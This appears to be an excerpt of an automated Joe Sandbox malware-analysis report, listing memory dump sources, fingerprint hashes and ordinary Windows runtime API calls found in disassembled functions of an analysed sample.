                                                                                                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.2506046644.00000000006E1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.2506098834.0000000000712000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.2506629637.0000000000714000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.2506885951.0000000000715000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.2507165628.0000000000717000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.2507165628.000000000071A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_10_2_610000_4888.jbxd
                                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                                                                  • Opcode ID: 72aaf8f1b791b4b2ac3ffe55bfbdf45684d85857173ae085280172db4a583e73
                                                                                                                                                                                                                                                                                                                  • Instruction ID: 8452bf08a521456d92280856f9c557e8d2fec9ceca0c1a03551790b6b6ac33c0
                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 72aaf8f1b791b4b2ac3ffe55bfbdf45684d85857173ae085280172db4a583e73
                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 63B1A6F1A08249AFDB15DF69C880BFD7BB6AF85300F148159E5056B392C774DD82CB68
                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                  • _ValidateLocalCookies.LIBCMT ref: 00659217
                                                                                                                                                                                                                                                                                                                  • _ValidateLocalCookies.LIBCMT ref: 006592A8
                                                                                                                                                                                                                                                                                                                  • _ValidateLocalCookies.LIBCMT ref: 00659328
                                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                  • Source File: 0000000A.00000002.2505629954.000000000061F000.00000020.00000001.01000000.00000007.sdmp, Offset: 00610000, based on PE: true
                                                                                                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.2505578000.0000000000610000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.2505629954.0000000000611000.00000020.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.2505629954.000000000061C000.00000020.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.2505629954.00000000006C1000.00000020.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.2505990969.00000000006C8000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.2506046644.00000000006E1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.2506098834.0000000000712000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.2506629637.0000000000714000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.2506885951.0000000000715000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.2507165628.0000000000717000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.2507165628.000000000071A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_10_2_610000_4888.jbxd
                                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                  • API ID: CookiesLocalValidate
                                                                                                                                                                                                                                                                                                                  • String ID: csm
                                                                                                                                                                                                                                                                                                                  • API String ID: 2268201637-1018135373
                                                                                                                                                                                                                                                                                                                  • Opcode ID: ae13287e0e3c23272cb7f51b24c499e37273c5e023b1bf0af1aaf10a2b9b4052
                                                                                                                                                                                                                                                                                                                  • Instruction ID: 2c36f1d36911853ab04914bd4fb68758b8b398cf42d793bc5f02be6123adb141
                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: ae13287e0e3c23272cb7f51b24c499e37273c5e023b1bf0af1aaf10a2b9b4052
                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 83412934A00219EBCF10DF68C885ADE7BB3EF45325F188099EC155B392D7319E59CBA1
                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                  • LoadLibraryExW.KERNEL32(?,00000000,00000800,?,00663BCD), ref: 00663DC8
                                                                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32(?,00663BCD), ref: 00663DD2
                                                                                                                                                                                                                                                                                                                  • LoadLibraryExW.KERNEL32(?,00000000,00000000), ref: 00663DFA
                                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                  • Source File: 0000000A.00000002.2505629954.000000000061F000.00000020.00000001.01000000.00000007.sdmp, Offset: 00610000, based on PE: true
                                                                                                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.2505578000.0000000000610000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.2505629954.0000000000611000.00000020.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.2505629954.000000000061C000.00000020.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.2505629954.00000000006C1000.00000020.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.2505990969.00000000006C8000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.2506046644.00000000006E1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.2506098834.0000000000712000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.2506629637.0000000000714000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.2506885951.0000000000715000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.2507165628.0000000000717000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.2507165628.000000000071A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_10_2_610000_4888.jbxd
                                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                  • API ID: LibraryLoad$ErrorLast
                                                                                                                                                                                                                                                                                                                  • String ID: api-ms-
                                                                                                                                                                                                                                                                                                                  • API String ID: 3177248105-2084034818
                                                                                                                                                                                                                                                                                                                  • Opcode ID: 830e90adf0abc3b830d2b1e1f9629042e4ee18f6cd82412c62ea8aa018d7bab6
                                                                                                                                                                                                                                                                                                                  • Instruction ID: f2b31358111a986b3f07d58bc86132b140e05a0ed382351cf2566356a8f0f559
                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 830e90adf0abc3b830d2b1e1f9629042e4ee18f6cd82412c62ea8aa018d7bab6
                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 2DE04830284209B7EB101F65EC06F993FAAAB51B50F54C021F90CE82E1DBA7DE60D9D8
                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                  • GetConsoleOutputCP.KERNEL32(FF670357), ref: 006A5B32
                                                                                                                                                                                                                                                                                                                  • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 006A5D8D
                                                                                                                                                                                                                                                                                                                  • WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 006A5DD5
                                                                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32 ref: 006A5E78
                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                  • Source File: 0000000A.00000002.2505629954.000000000061F000.00000020.00000001.01000000.00000007.sdmp, Offset: 00610000, based on PE: true
                                                                                                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.2505578000.0000000000610000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.2505629954.0000000000611000.00000020.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.2505629954.000000000061C000.00000020.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.2505629954.00000000006C1000.00000020.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.2505990969.00000000006C8000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.2506046644.00000000006E1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.2506098834.0000000000712000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.2506629637.0000000000714000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.2506885951.0000000000715000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.2507165628.0000000000717000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.2507165628.000000000071A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_10_2_610000_4888.jbxd
                                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                  • API ID: FileWrite$ConsoleErrorLastOutput
                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                  • API String ID: 2718003287-0
                                                                                                                                                                                                                                                                                                                  • Opcode ID: 2b5e1b7d8bccbe97363238e6df00fec27426c7a997a61285ab5a81259415c011
                                                                                                                                                                                                                                                                                                                  • Instruction ID: 863cf063cba6cbf68d45b1f415699d44ccafcb99944c353b4f741586c3814560
                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 2b5e1b7d8bccbe97363238e6df00fec27426c7a997a61285ab5a81259415c011
                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 97D169B5D00658AFCB15DFA8D8809EDBBB6FF4A310F18812AE816E7351D730A942CF54
                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                  • SetFilePointerEx.KERNEL32(?,00000000,00000000,?,00000001,?), ref: 006A766D
                                                                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32(?,?,?,?), ref: 006A767A
                                                                                                                                                                                                                                                                                                                  • SetFilePointerEx.KERNEL32(?,?,?,?,?), ref: 006A76A0
                                                                                                                                                                                                                                                                                                                  • SetFilePointerEx.KERNEL32(?,?,?,00000000,00000000,?,?,?), ref: 006A76C6
                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                  • Source File: 0000000A.00000002.2505629954.000000000061F000.00000020.00000001.01000000.00000007.sdmp, Offset: 00610000, based on PE: true
                                                                                                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.2505578000.0000000000610000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.2505629954.0000000000611000.00000020.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.2505629954.000000000061C000.00000020.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.2505629954.00000000006C1000.00000020.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.2505990969.00000000006C8000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.2506046644.00000000006E1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.2506098834.0000000000712000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.2506629637.0000000000714000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.2506885951.0000000000715000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.2507165628.0000000000717000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.2507165628.000000000071A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_10_2_610000_4888.jbxd
                                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                  • API ID: FilePointer$ErrorLast
                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                  • API String ID: 142388799-0
                                                                                                                                                                                                                                                                                                                  • Opcode ID: 895417501e9bbd6347cc604d2c8b458d3f32eef687dbf8fe9c95bf099b39da5e
                                                                                                                                                                                                                                                                                                                  • Instruction ID: 38aab4b0cd8eee6309b5a91c7f09936fa5286e958276eb5c8a50a78ea3412126
                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 895417501e9bbd6347cc604d2c8b458d3f32eef687dbf8fe9c95bf099b39da5e
                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: A3115A71908519BBCF11AF59CC08ADF3FBAEF42360F108145F814A22A1D7319A50DFA4
                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                  • WriteConsoleW.KERNEL32(?,?,?,00000000), ref: 006BD380
                                                                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32 ref: 006BD38C
                                                                                                                                                                                                                                                                                                                  • ___initconout.LIBCMT ref: 006BD39C
                                                                                                                                                                                                                                                                                                                    • Part of subcall function 006BD41A: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,006BD3A1), ref: 006BD42D
                                                                                                                                                                                                                                                                                                                  • WriteConsoleW.KERNEL32(?,?,?,00000000), ref: 006BD3B0
                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                  • Source File: 0000000A.00000002.2505629954.000000000061F000.00000020.00000001.01000000.00000007.sdmp, Offset: 00610000, based on PE: true
                                                                                                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.2505578000.0000000000610000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.2505629954.0000000000611000.00000020.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.2505629954.000000000061C000.00000020.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.2505629954.00000000006C1000.00000020.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.2505990969.00000000006C8000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.2506046644.00000000006E1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.2506098834.0000000000712000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.2506629637.0000000000714000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.2506885951.0000000000715000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.2507165628.0000000000717000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.2507165628.000000000071A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_10_2_610000_4888.jbxd
                                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                  • API ID: ConsoleWrite$CreateErrorFileLast___initconout
                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                  • API String ID: 3431868840-0
                                                                                                                                                                                                                                                                                                                  • Opcode ID: 6c6a5797dc5238003d63149f8c79b29429686d67aaac8a62ca230d3e35559ecf
                                                                                                                                                                                                                                                                                                                  • Instruction ID: db3deae4f9cb2852e0905baf688f0418f4ba0ce4106e0d574d744dc72ae823e9
                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 6c6a5797dc5238003d63149f8c79b29429686d67aaac8a62ca230d3e35559ecf
                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 4FF05E3A101600ABCB261F99DC059C67FB7FFCD761710C418F59986270DA71A891DB69
                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                  • WriteConsoleW.KERNEL32(?,?,?,00000000), ref: 006BD499
                                                                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32 ref: 006BD4A5
                                                                                                                                                                                                                                                                                                                  • ___initconout.LIBCMT ref: 006BD4B5
                                                                                                                                                                                                                                                                                                                    • Part of subcall function 006BD41A: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,006BD3A1), ref: 006BD42D
                                                                                                                                                                                                                                                                                                                  • WriteConsoleW.KERNEL32(?,?,?,00000000), ref: 006BD4CA
                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                  • Source File: 0000000A.00000002.2505629954.000000000061F000.00000020.00000001.01000000.00000007.sdmp, Offset: 00610000, based on PE: true
                                                                                                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.2505578000.0000000000610000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.2505629954.0000000000611000.00000020.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.2505629954.000000000061C000.00000020.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.2505629954.00000000006C1000.00000020.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.2505990969.00000000006C8000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.2506046644.00000000006E1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.2506098834.0000000000712000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.2506629637.0000000000714000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.2506885951.0000000000715000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.2507165628.0000000000717000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.2507165628.000000000071A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_10_2_610000_4888.jbxd
                                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                  • API ID: ConsoleWrite$CreateErrorFileLast___initconout
                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                  • API String ID: 3431868840-0
                                                                                                                                                                                                                                                                                                                  • Opcode ID: d4dbd69f0737bc33f651c8b8946aadc0b6cb91dea67368729782c25b0f0280e1
                                                                                                                                                                                                                                                                                                                  • Instruction ID: fe108a920770f567fabdadcefbdf72721dc57d98c65407bd10514fd7e5adb46d
                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: d4dbd69f0737bc33f651c8b8946aadc0b6cb91dea67368729782c25b0f0280e1
                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 35F03036041118BBCF221F99DC089C93F76FF097A1B44C114FA1999270D7729D60DB99
                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                  • Source File: 0000000A.00000002.2505629954.000000000061F000.00000020.00000001.01000000.00000007.sdmp, Offset: 00610000, based on PE: true
                                                                                                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.2505578000.0000000000610000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.2505629954.0000000000611000.00000020.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.2505629954.000000000061C000.00000020.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.2505629954.00000000006C1000.00000020.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.2505990969.00000000006C8000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.2506046644.00000000006E1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.2506098834.0000000000712000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.2506629637.0000000000714000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.2506885951.0000000000715000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.2507165628.0000000000717000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.2507165628.000000000071A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_10_2_610000_4888.jbxd
                                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                                                  • String ID: Xeq$Xeq
                                                                                                                                                                                                                                                                                                                  • API String ID: 0-1672132113
                                                                                                                                                                                                                                                                                                                  • Opcode ID: f137c69a3ae87058113f06e7029fdde95fc4c011df1e809066162238a1efe5a3
                                                                                                                                                                                                                                                                                                                  • Instruction ID: 1328b0d563121a3a3ff788c6f5ac07f83c11ad9713c1e99ccf5c6bcfe9df1c5b
                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: f137c69a3ae87058113f06e7029fdde95fc4c011df1e809066162238a1efe5a3
                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 8A319FB5A00318ABCF21AFA9CC81DDEBBBEEF44754B14807AF81597345D6709E44CB94
                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                                  • GetXStateFeaturesMask, xrefs: 006A2026
                                                                                                                                                                                                                                                                                                                  • InitializeCriticalSectionEx, xrefs: 006A2076
                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                  • Source File: 0000000A.00000002.2505629954.000000000061F000.00000020.00000001.01000000.00000007.sdmp, Offset: 00610000, based on PE: true
                                                                                                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.2505578000.0000000000610000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.2505629954.0000000000611000.00000020.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.2505629954.000000000061C000.00000020.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.2505629954.00000000006C1000.00000020.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.2505990969.00000000006C8000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.2506046644.00000000006E1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.2506098834.0000000000712000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.2506629637.0000000000714000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.2506885951.0000000000715000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.2507165628.0000000000717000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.2507165628.000000000071A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_10_2_610000_4888.jbxd
                                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                                                  • String ID: GetXStateFeaturesMask$InitializeCriticalSectionEx
                                                                                                                                                                                                                                                                                                                  • API String ID: 0-4196971266
                                                                                                                                                                                                                                                                                                                  • Opcode ID: c3c4d9f737af005a188196f101313f15bad2272c38c71541726183315051055d
                                                                                                                                                                                                                                                                                                                  • Instruction ID: c13415238e7fdb9fe3bca4b3f88747688c735eec110f37729f04cbb042ee4706
                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: c3c4d9f737af005a188196f101313f15bad2272c38c71541726183315051055d
                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 7D018432680228BBCB213B55CC05F9E7E17DB45BB0F098025FE1C25690CAB54D11DAD4
                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2646148974.0000000009120000.00000040.00000800.00020000.00000000.sdmp, Offset: 09120000, based on PE: false
                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
